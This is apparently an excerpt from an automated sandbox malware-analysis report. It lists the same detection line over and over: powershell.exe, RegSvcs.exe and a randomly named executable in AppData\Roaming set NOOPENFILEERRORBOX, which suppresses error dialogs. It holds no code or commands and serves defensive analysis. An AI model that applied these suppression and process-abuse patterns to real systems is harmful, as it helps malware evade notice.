                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
